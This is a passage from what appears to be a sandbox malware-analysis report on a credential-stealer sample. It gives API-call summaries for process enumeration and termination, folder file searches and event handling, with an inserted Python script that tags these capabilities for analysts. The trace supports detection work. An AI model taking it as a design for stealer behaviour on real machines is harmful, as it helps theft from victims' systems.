                                              • CloseHandle.KERNEL32(00000000), ref: 048599CD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                              • String ID:
                                              • API String ID: 3729781310-0
                                              • Opcode ID: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                              • Instruction ID: 78a81fb654212aac759c2e64c5fa6e4ebaf694ebd4499e2bde13b1b2023d66b9
                                              • Opcode Fuzzy Hash: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                              • Instruction Fuzzy Hash: 57313CB1E01248EBDB14DFE0CC88BEDB779BB44304F104A59E906AA194EB746A48CB52
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 04858AC1
                                              • Process32First.KERNEL32(?,00000128), ref: 04858AD5
                                              • Process32Next.KERNEL32(?,00000128), ref: 04858AEA
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • CloseHandle.KERNEL32(?), ref: 04858B58
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                              • String ID:
                                              • API String ID: 1066202413-0
                                              • Opcode ID: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                              • Instruction ID: 0b6d32afa72e70eadeeea201484540d6a34eb93dcd90a964ee334cda6b756317
                                              • Opcode Fuzzy Hash: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                              • Instruction Fuzzy Hash: D93144719012589BDB68EF54DC80FEEB778EF44705F10479AA909E21A0EB706F44CF92
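The OpenProcess/TerminateProcess summary and the CreateToolhelp32Snapshot/Process32First/Process32Next summary above, together with the earlier CopyFileA/DeleteFileA entries, are the kind of API clusters an analyst wants flagged automatically when reading a listing this long. The Python script below is an added example, not code from the Joe Sandbox report or from the Stealc sample: it parses function summaries in this page's layout (a constructed sample excerpted from the entries above is embedded so it runs offline), folds ANSI/wide name variants such as lstrlenA/lstrlen onto one base name, tags each function from a small capability table that is this example's own assumption, and decodes the OpenProcess access mask seen at 0041973B and 048599A2 (0x1001) into its PROCESS_* rights.

```python
"""Capability tagging over Joe Sandbox function summaries.
Added example, not code from the Joe Sandbox report or the Stealc sample. It parses
the layout used on this page ("APIs", then bullets "Name.MODULE(args), ref: ADDR",
including "Part of subcall function" lines) and maps each function's API set to
coarse capability tags. The tag table and the access-mask decoder are assumptions.
"""
import re
from dataclasses import dataclass

# Constructed sample: three summaries excerpted from this report, in its own layout.
SAMPLE = """\
APIs
  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
• lstrlenA.KERNEL32(00000000), ref: 0040DA9F
• DeleteFileA.KERNEL32(00000000), ref: 0040DB32
Memory Dump Source
APIs
• memset.MSVCRT ref: 0041967B
• OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
• CloseHandle.KERNEL32(00000000), ref: 00419766
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 04858AC1
• Process32First.KERNEL32(?,00000128), ref: 04858AD5
• Process32Next.KERNEL32(?,00000128), ref: 04858AEA
• CloseHandle.KERNEL32(?), ref: 04858B58
Memory Dump Source
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    name: str
    args: list
    ref: str
    indirect: bool  # True for "Part of subcall function" entries

def normalise(name):
    """Fold ANSI/wide pairs (lstrlenA/lstrlen, wsprintfA/wsprintfW) onto one base name;
    a trailing A/W is stripped only after a lowercase letter or digit."""
    if len(name) > 2 and name[-1] in "AW" and (name[-2].islower() or name[-2].isdigit()):
        return name[:-1]
    return name

def api_names(calls):
    return {normalise(c.name) for c in calls}

def parse_summaries(text):
    """One list of ApiCall per "APIs" block; a block ends at the first non-bullet line."""
    funcs, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            funcs.append(current)
            continue
        if current is None or not stripped.startswith("•"):
            current = None
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.append(ApiCall(m.group("name"), args, m.group("ref"), m.group("sub") is not None))
    return funcs

# A tag fires when every listed API (after normalisation) appears in the function.
CAPABILITIES = {
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "process-termination": {"OpenProcess", "TerminateProcess"},
    "stage-copy-then-delete": {"CopyFile", "DeleteFile"},
    "dynamic-api-resolution": {"LoadLibrary", "GetProcAddress"},
}

def tag(calls):
    names = api_names(calls)
    return sorted(t for t, need in CAPABILITIES.items() if need <= names)

# Subset of PROCESS_* access rights (winnt.h values) used to decode OpenProcess.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

def open_process_rights(calls):
    """Decode dwDesiredAccess (first OpenProcess argument, hex) for each resolvable call."""
    out = []
    for c in calls:
        if normalise(c.name) == "OpenProcess" and c.args and c.args[0] != "?":
            mask = int(c.args[0], 16)
            out.append([n for bit, n in sorted(PROCESS_ACCESS.items()) if mask & bit])
    return out

if __name__ == "__main__":
    for i, calls in enumerate(parse_summaries(SAMPLE)):
        print(i, sorted(api_names(calls)), tag(calls), open_process_rights(calls))
```

Run it as-is, or replace SAMPLE with the text of a full report. On the entries above it yields stage-copy-then-delete, process-termination and process-enumeration for the three functions, and decodes 0x1001 to PROCESS_TERMINATE plus PROCESS_QUERY_LIMITED_INFORMATION: the handle is opened with just enough rights to kill the target, which matches the TerminateProcess that follows. The snapshot flag 0x2 in CreateToolhelp32Snapshot is TH32CS_SNAPPROCESS, the process list that Process32First/Next then walk.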
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                              • wsprintfA.USER32 ref: 004189E0
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocProcesslstrcpywsprintf
                                              • String ID: %dx%d
                                              • API String ID: 2716131235-2206825331
                                              • Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                              • Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
                                              • Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                              • Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5
                                              APIs
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 048BF27A
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 048BF293
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Value___vcrt_
                                              • String ID:
                                              • API String ID: 1426506684-0
                                              • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                              • Instruction ID: cff97e85a73899cf75de2c3e639f4305c701361c3274afe4133440f7ede3a56c
                                              • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                              • Instruction Fuzzy Hash: 8601DD36208625DFFB241BB85CC4EDB2754E7016BDB304B2EE725C12E0EFA1A84055C0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcessstrtok_s
                                              • String ID:
                                              • API String ID: 3407564107-0
                                              • Opcode ID: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                              • Instruction ID: 4b07558c121b00ad77cb905b072214e6e1d6e24fef0ce499ec8110a6b7b545d3
                                              • Opcode Fuzzy Hash: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                              • Instruction Fuzzy Hash: D8113D74D00109EFDB04EFE4D948BEDBB74BF44309F108569E915A7260EB706B49CB55
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                              • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                              • wsprintfA.USER32 ref: 00417B83
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                              • String ID:
                                              • API String ID: 1243822799-0
                                              • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                              • Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
                                              • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                              • Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 04857DA7
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04857DAE
                                              • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 04857DBB
                                              • wsprintfA.USER32 ref: 04857DEA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                                              • String ID:
                                              • API String ID: 377395780-0
                                              • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                              • Instruction ID: c4faadca5719c3712002d90b183c44af5cd82839c99717e311f36e5d504ddfd5
                                              • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                              • Instruction Fuzzy Hash: 20112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10421AF605A2280E2395940C7B5
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 04857E5A
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04857E61
                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 04857E74
                                              • wsprintfA.USER32 ref: 04857EAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                              • String ID:
                                              • API String ID: 3317088062-0
                                              • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                              • Instruction ID: 219fc6815d02803744c97b1bafb22e62b4baec81411eed20048f70c1544859d9
                                              • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                              • Instruction Fuzzy Hash: 66118EB1E06228EBEB208B54DC45FA9BB78FB05711F1047EAF619A32D0D7746A408B55
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s
                                              • String ID:
                                              • API String ID: 3330995566-0
                                              • Opcode ID: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                              • Instruction ID: 245e4928704cdbf54503f827af8d62afab9c5803acf0f6e05383f66c49be633c
                                              • Opcode Fuzzy Hash: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                              • Instruction Fuzzy Hash: 01112A70E002099FDB18CFE9D948BEEB7B9EF04344F008119E915BA260E774A504CF55
                                              APIs
                                              • CreateFileA.KERNEL32(04853FA5,80000000,00000003,00000000,00000003,00000080,00000000,?,04853FA5,?), ref: 048596F3
                                              • GetFileSizeEx.KERNEL32(000000FF,04853FA5), ref: 04859710
                                              • CloseHandle.KERNEL32(000000FF), ref: 0485971E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSize
                                              • String ID:
                                              • API String ID: 1378416451-0
                                              • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                              • Instruction ID: da3f7d67158007c80c7f1be58e2c6b4e790c161403a879fbe987a044988059bd
                                              • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                              • Instruction Fuzzy Hash: D8F03779E14208FBDB14DFB0EC49B9E77BAAB48704F10C696FA15E72D0E730A6018B40
                                              APIs
                                              • LoadLibraryA.KERNEL32(004212DC), ref: 0484A2FF
                                              • GetProcAddress.KERNEL32(006D70A8,004212F8), ref: 0484A325
                                              • GetProcAddress.KERNEL32(006D70A8,00421310), ref: 0484A33C
                                              • FreeLibrary.KERNEL32(006D70A8), ref: 0484A360
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressLibraryProc$FreeLoad
                                              • String ID:
                                              • API String ID: 2256533930-0
                                              • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                              • Instruction ID: 3d2e6ef11a00381cbb2f38f9e74b8cf8336fb7da56e2af45c5f67c2aaef2bea2
                                              • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                              • Instruction Fuzzy Hash: 2CF049B4A4A228EFD7149B68EC08B5537A6F348701F406A26F505CB2E0F3B46084CB22
                                              APIs
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 04856FD1
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04856FEF
                                              • CloseHandle.KERNEL32(00000000), ref: 04857000
                                              • Sleep.KERNEL32(00001770), ref: 0485700B
                                              • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 04857021
                                              • ExitProcess.KERNEL32 ref: 04857029
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                              • String ID:
                                              • API String ID: 941982115-0
                                              • Opcode ID: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                              • Instruction ID: 6912e7a415e686864c9eaf006779315cd3d800ab82204d3494c4fa63dac9ed58
                                              • Opcode Fuzzy Hash: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                              • Instruction Fuzzy Hash: FDF05E30E48219EAEB20BBA0DC04B7DB775AB04709F144F15BD16E11F0EBB07500DA63
                                              APIs
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 048BEE8E
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 048BEF42
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 3480331319-1018135373
                                              • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                              • Instruction ID: 9576b1d10e72a484445d8d9340af2b5078824d11f94d6713f68e8ab43ee7da17
                                              • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                              • Instruction Fuzzy Hash: 9941A030A00218DFDB10DF68CC84AEEBBA1EF45318F148A95E859DB391D771E911CBD2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Catch
                                              • String ID: MOC$RCC
                                              • API String ID: 78271584-2084237596
                                              • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                              • Instruction ID: b8136c50e73b0685f0df1b100730467973fae2cc2d015f2006e5dd29856cf6d9
                                              • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                              • Instruction Fuzzy Hash: 9E414931900109AFDF16CF98CD80AEEBBB5FF48308F149659EB44E7220D375A990DB91
                                              APIs
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
                                              • lstrcatA.KERNEL32(?,02CA5550), ref: 004152F8
                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                              • String ID: 9dA
                                              • API String ID: 2699682494-3568425128
                                              • Opcode ID: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
                                              • Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
                                              • Opcode Fuzzy Hash: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
                                              • Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 0484A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0484A7E4
                                              • lstrlen.KERNEL32(00000000), ref: 0484BED6
                                                • Part of subcall function 04859227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 04859249
                                              • StrStrA.SHLWAPI(00000000,0042143C), ref: 0484BF04
                                              • lstrlen.KERNEL32(00000000), ref: 0484BFDC
                                              • lstrlen.KERNEL32(00000000), ref: 0484BFF0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                              • String ID:
                                              • API String ID: 1440504306-0
                                              • Opcode ID: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                              • Instruction ID: 8f0f20af007fe7730caec973a20f298a4ef90096a82fa3e3efcd8fc71ac52424
                                              • Opcode Fuzzy Hash: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                              • Instruction Fuzzy Hash: C6B107719001189BDF1CFBA4DC95EED7339AF54209F504B69E906E60A0EFB47A48CB62
                                              APIs
                                              • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                              • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                              • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                              • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFileNextlstrcat
                                              • String ID: q?A
                                              • API String ID: 3840410801-4084695119
                                              • Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                              • Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
                                              • Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                              • Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55
                                              APIs
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                              • lstrcat.KERNEL32(?,00000000), ref: 04855431
                                              • lstrcat.KERNEL32(?,00421058), ref: 0485544E
                                              • lstrcat.KERNEL32(?,006D6FF8), ref: 04855462
                                              • lstrcat.KERNEL32(?,0042105C), ref: 04855474
                                                • Part of subcall function 04854DC7: wsprintfA.USER32 ref: 04854DE3
                                                • Part of subcall function 04854DC7: FindFirstFileA.KERNEL32(?,?), ref: 04854DFA
                                                • Part of subcall function 04854DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 04854E28
                                                • Part of subcall function 04854DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 04854E3E
                                                • Part of subcall function 04854DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 04855034
                                                • Part of subcall function 04854DC7: FindClose.KERNEL32(000000FF), ref: 04855049
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                              • String ID:
                                              • API String ID: 2667927680-0
                                              • Opcode ID: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                              • Instruction ID: 5a3e4ed684ae709eb0163586438de6cae7b6fcc94c7b2c48ac1a7258c3e727f4
                                              • Opcode Fuzzy Hash: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
